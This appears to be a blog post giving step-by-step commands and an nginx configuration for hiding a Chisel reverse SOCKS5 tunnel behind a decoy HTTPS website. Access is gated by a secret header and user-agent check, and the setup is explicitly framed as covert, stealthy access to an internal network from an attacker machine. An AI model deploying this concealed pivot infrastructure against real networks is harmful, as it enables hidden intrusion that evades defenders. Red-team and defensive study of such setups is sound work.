Field Manual: Deploying a Secure Chisel Tunnel Behind Nginx

on

 

🔰 Field Manual: Deploying a Secure Chisel Tunnel Behind Nginx

***Need a Domain name before proceeding further.

📌 Overview

This guide details how to set up a secure and stealthy Chisel tunnel behind an Nginx reverse proxy with TLS encryption. The infrastructure allows for covert access to an internal network through a public domain while masquerading as a legitimate website.

🛠️ Infrastructure Components

1️⃣ Chisel Server (Cloud VPS)

  • Hosts the SOCKS5 proxy and allows reverse tunneling.

  • Restricted access using authentication and custom headers.

2️⃣ Nginx Reverse Proxy (Cloud VPS)

  • Hides Chisel behind HTTPS (/tunnel).

  • Serves a normal website for cover.

3️⃣ TLS Certificates (Let's Encrypt or Self-Signed)

  • Encrypts Chisel traffic for security and stealth.

4️⃣ Chisel Client (Attacker Machine)

  • Establishes a reverse tunnel connection.

  • Provides a SOCKS5 proxy to access the internal network.

🚀 Deployment Steps

1️⃣ Install & Configure Chisel Server

📌 Step 1: Install Chisel on Cloud VPS

sudo apt update && sudo apt install -y git curl
cd /opt
sudo git clone https://github.com/jpillora/chisel.git && cd chisel
sudo go build -o chisel
sudo mv chisel /usr/local/bin/

📌 Step 2: Create Authentication File

sudo mkdir -p /etc/chisel
sudo nano /etc/chisel/chisel-users

Add the following JSON structure:

{
  "testUser": ["TestPass#123"]
}

Save and exit (Ctrl + X, then Y)

📌 Step 3: Start Chisel Server

sudo chisel server --socks5 --reverse --port 8000 --authfile /etc/chisel/chisel-users

✅ Chisel is now running on port 8000 but is not yet secured.

2️⃣ Set Up Nginx Reverse Proxy

📌 Step 1: Install Nginx

sudo apt install nginx -y

📌 Step 2: Configure Nginx for Chisel

sudo nano /etc/nginx/sites-available/chisel

Paste the following configuration:

server {
    listen 443 ssl;
    server_name "domain name without http https";

    ssl_certificate /etc/letsencrypt/live/folder/fullchain.pem;
    ssl_certificate_key /etc/letsencrypt/live/folder/privkey.pem;
    ssl_protocols TLSv1.2 TLSv1.3;
    ssl_prefer_server_ciphers on;

    location / {
        root /var/www/html;
        index index.html index.htm;
    }
    
    location /tunnel {
        if ($http_x_special_header != "our_secret_value") {
            return 301 https://"domain name";
        }
        if ($http_user_agent != "Go-http-client/1.1") {
            return 301 https://domain name;
        }
        proxy_pass http://localhost:8000;
        proxy_http_version 1.1;
        proxy_set_header Upgrade $http_upgrade;
        proxy_set_header Connection "upgrade";
        proxy_set_header Host $host;
    }
}

📌 Step 3: Enable the Nginx Configuration

sudo ln -s /etc/nginx/sites-available/chisel /etc/nginx/sites-enabled/
sudo nginx -t && sudo systemctl restart nginx

✅ Now, Chisel is only accessible through https://"domain name" with the correct secret header.

3️⃣ Secure with SSL/TLS Certificates

📌 Option 1: Free TLS via Let's Encrypt (Recommended)

sudo apt install certbot python3-certbot-nginx -y
sudo certbot certonly --nginx -d "domain name wihtout http https"

✅ Certificates will be stored in:

/etc/letsencrypt/live/folder/fullchain.pem
/etc/letsencrypt/live/folder/privkey.pem

📌 Option 2: Self-Signed TLS for Testing

sudo mkdir -p /etc/chisel/pemFormat/chisel_domain_certs
cd /etc/chisel/pemFormat/chisel_domain_certs
sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout privkey.pem -out fullchain.pem

✅ Store in:

/etc/chisel/pemFormat/chisel_domain_certs/fullchain.pem
/etc/chisel/pemFormat/chisel_domain_certs/privkey.pem

Restart Nginx:

sudo systemctl restart nginx

------------------------
CHISEL CLIENT:

sudo chisel client -v --header "X-Special-Header: our_secret_value" --auth "testUser:TestPass#123" https://"domain name" R:1080:socks

 Troubleshooting Guide

Issue 1: Chisel Client Not Connecting

Fix:

  • Ensure Nginx is correctly forwarding requests to Chisel (sudo systemctl restart nginx).

  • Verify Chisel is running on port 8000 (netstat -tulnp | grep 8000).

  • Check authentication details (cat /etc/chisel/chisel-users).

Issue 2: TLS Certificate Errors

Fix:

  • If using Let's Encrypt, renew certificates (sudo certbot renew).

  • If using self-signed certs, ensure the correct paths are set in Nginx.

Issue 3: SOCKS5 Proxy Not Working

Fix:

  • Ensure the Chisel client is running with R:1080:socks.

  • Verify ProxyChains is correctly configured (cat /etc/proxychains4.conf).

  • Test proxy manually: curl --proxy socks5h://127.0.0.1:1080 http://example.com.

🚀 Now you have a fully functional, stealthy Chisel tunnel behind Nginx! Let me know if you need further modifications. 😊🔥

Comments

Post a Comment